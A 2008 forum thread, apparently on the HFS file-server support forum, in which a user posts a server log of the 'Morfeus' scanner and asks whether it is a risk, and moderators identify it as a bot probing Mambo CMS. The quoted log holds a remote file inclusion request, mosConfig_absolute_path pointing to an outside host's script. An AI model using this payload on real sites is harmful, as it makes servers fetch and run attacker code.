Author Topic: Did anyone know anything about "Morfeus Fucking Scanner"  (Read 15986 times)

0 Members and 1 Guest are viewing this topic.

Offline Pit

  • Tireless poster
  • ****
  • Posts: 115
    • View Profile
    • EDV & Netzwerkservice in Berlin
Did anyone know anything about "Morfeus Fucking Scanner"
« on: November 17, 2008, 05:42:21 PM »
Much time of today my webserver was scannt from "Morfeus Fucking Scanner"
This is a part of the log:

17.11.2008 16:54:10 194.165.49.36:50035 Connected
17.11.2008 16:54:10 194.165.49.36:50035 Disconnected
17.11.2008 16:56:10 194.165.49.36:46236 Connected
17.11.2008 16:56:10 194.165.49.36:46236 Requested GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/
17.11.2008 16:56:10 194.165.49.36:46236 Request dump
> GET /?mosConfig_absolute_path=http://host.nikoniqdesigns.com/~silverso/c.in??/ HTTP/1.1
> Accept: */*
> Accept-Language: en-us
> Accept-Encoding: gzip, deflate
> User-Agent: Morfeus Fucking Scanner
> Host: 91.37.233.251
> Connection: Close
17.11.2008 16:56:10 194.165.49.36:46236 Served 3,61 KB
17.11.2008 16:56:10 194.165.49.36:46236 Disconnected by server - 3693 bytes sent
17.11.2008 16:56:10 194.165.49.36:46363 Connected
17.11.2008 16:56:10 194.165.49.36:46363 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:10 194.165.49.36:46439 Connected
17.11.2008 16:56:10 194.165.49.36:46439 Disconnected by server - 1822 bytes sent
17.11.2008 16:56:11 194.165.49.36:46512 Connected
17.11.2008 16:56:11 194.165.49.36:46512 Disconnected by server - 1823 bytes sent
17.11.2008 16:56:11 194.165.49.36:46590 Connected
17.11.2008 16:56:11 194.165.49.36:46590 Disconnected by server - 1823 bytes sent


Did anyone know anything about "Morfeus Fucking Scanner" and is it a risk for HFS?
You reach our Webserver every day between 9 AM to 10 PM under: http://phampel.dyndns.org or http://free4you.dyndns.org

Offline rejetto

  • Administrator
  • Tireless poster
  • *
  • Posts: 12890
    • View Profile
Re: Did anyone know anything about "Morfeus Fucking Scanner"
« Reply #1 on: November 17, 2008, 06:05:17 PM »
never heard, and it's not a risk IMO.
with event scripts you can even ban it, just to get a cleaner log.
but if it comes from a single IP you can just ban the ip, easier.

Offline Pit

  • Tireless poster
  • ****
  • Posts: 115
    • View Profile
    • EDV & Netzwerkservice in Berlin
Re: Did anyone know anything about "Morfeus Fucking Scanner"
« Reply #2 on: November 17, 2008, 06:07:03 PM »
That was the first thing wat i have done. I think it is DDos-Attack.
You reach our Webserver every day between 9 AM to 10 PM under: http://phampel.dyndns.org or http://free4you.dyndns.org

Offline rejetto

  • Administrator
  • Tireless poster
  • *
  • Posts: 12890
    • View Profile
Re: Did anyone know anything about "Morfeus Fucking Scanner"
« Reply #3 on: November 17, 2008, 06:09:15 PM »
or maybe it is just searching for buggy IIS

Offline SilentPliz

  • Operator
  • Tireless poster
  • *****
  • Posts: 1181
  • ....... chut ! shh!
    • View Profile
Re: Did anyone know anything about "Morfeus Fucking Scanner"
« Reply #4 on: November 17, 2008, 06:09:47 PM »
Morfeus is a scanner that looks for vulnerabilities in PHP based web sites (bot).

I don't think it could be a danger to HFS.

« Last Edit: November 17, 2008, 06:12:12 PM by SilentPliz »

Offline rejetto

  • Administrator
  • Tireless poster
  • *
  • Posts: 12890
    • View Profile
Re: Did anyone know anything about "Morfeus Fucking Scanner"
« Reply #5 on: November 17, 2008, 06:15:48 PM »
a quick search on google will reveal that mosConfig_absolute_path is an attack to mambo (cms) installations

Offline Pit

  • Tireless poster
  • ****
  • Posts: 115
    • View Profile
    • EDV & Netzwerkservice in Berlin
Re: Did anyone know anything about "Morfeus Fucking Scanner"
« Reply #6 on: November 17, 2008, 06:20:17 PM »
Thanks for your replys and have a nice evening.
You reach our Webserver every day between 9 AM to 10 PM under: http://phampel.dyndns.org or http://free4you.dyndns.org

Offline SilentPliz

  • Operator
  • Tireless poster
  • *****
  • Posts: 1181
  • ....... chut ! shh!
    • View Profile
Re: Did anyone know anything about "Morfeus Fucking Scanner"
« Reply #7 on: November 17, 2008, 06:24:42 PM »
Thanks for your replys and have a nice evening.

Thank you, to you too. :)